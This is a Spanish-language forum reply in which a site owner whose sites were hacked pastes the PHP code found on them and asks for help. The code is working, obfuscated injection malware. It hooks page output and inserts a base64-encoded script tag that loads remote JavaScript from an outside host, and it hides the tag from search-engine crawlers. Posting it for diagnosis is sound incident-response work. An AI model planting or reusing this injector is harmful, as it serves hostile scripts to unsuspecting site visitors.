Ver Mensaje Individual
  #5 (permalink)  
Antiguo 24/04/2010, 14:12
Mogk
 
Fecha de Ingreso: enero-2008
Mensajes: 43
Antigüedad: 16 años, 9 meses
Puntos: 0
Respuesta: Me Hackearon mis sitios

si, aunque tengo tantas cosas online, que pienso que pudo entrar por algo de cuando empezaba.

Alguien encuentra aca algo que haga que se duplique?
Código PHP:
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
$GLOBALS['mr_no']=1; if(!function_exists('mrobh')){
if(!
function_exists('gml')){ function gml(){ if
(!
stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
(!
stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return
base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9jZWNoaXJlY29tLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg==");
} return 
""; } } if(!function_exists('gzdecode')){ function
gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
$RBE4C4D037E939226F65812885A53DAD9=10;
$RA3D52E52A48936CDE0F5356BB08652F2=0;
if(
$R30B2AB8DC1496D06B230A71D8962AF5D&4){
$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
} if(
$R30B2AB8DC1496D06B230A71D8962AF5D&8){
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
} if(
$R30B2AB8DC1496D06B230A71D8962AF5D&16){
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
} if(
$R30B2AB8DC1496D06B230A71D8962AF5D&2){
$RBE4C4D037E939226F65812885A53DAD9+=2; }
$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
if(
$R034AE2AB94F99CC81B389A1822DA3353===FALSE){
$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
} return 
$R034AE2AB94F99CC81B389A1822DA3353; } } function
mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding:
none'
); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
if(
preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
return 
preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
}else{ return 
$RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } }
ob_start('mrobh'); } }